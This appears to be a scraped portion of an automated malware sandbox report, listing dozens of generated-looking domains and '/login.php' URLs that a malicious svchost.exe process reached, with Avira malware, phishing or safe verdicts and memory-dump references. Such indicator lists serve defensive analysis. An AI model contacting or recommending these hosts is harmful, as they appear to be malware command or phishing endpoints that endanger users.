                                                                                                                        gatykyh.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          vocykem.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            gahynus.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              pumypop.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                lyvysur.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  puzypav.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    galypob.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      gacyqoz.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        lykywid.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          lykytin.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            vofyref.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              qekytig.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                vocyzek.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  puvypoq.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    puvybeg.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      pupydig.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        pupyguq.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          qedyqal.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            vowymom.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              purypol.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                ganypeb.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  vopymit.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vowyguf.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      pupytiq.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        lymyfoj.com
                                                                                                                                                                        unknown
Name | Malicious | Antivirus Detection | Reputation
http://lysyfyj.com/login.php | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyvuz.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumyjig.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyvup.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyxun.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vopyret.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvywed.com/http://gadyveb.com/http://lygyfex.com/http://gadyveb.com/svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vofypuk.com/psvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadykos.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahydos.com/Hsvchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qebyqeq.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojygok.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyryjir.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993850532.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995203314.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymyner.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacyhez.com/login.phpsvchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyfex.com/http://lyvywed.com/http://lygyfex.com/Hsvchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadypuw.com/http://gadypuw.com/http://lymyjon.com/svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pujyteq.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003764256.000000000B4FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2007310582.000000000B4FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyvav.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/lsvchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvydov.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahyqub.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796738953.00000000066C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151201367.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1581298263.00000000066BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pupywog.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymyxex.com/login.phpsvchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahydos.com/k/LMEMsvchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacynuz.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahyvuh.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
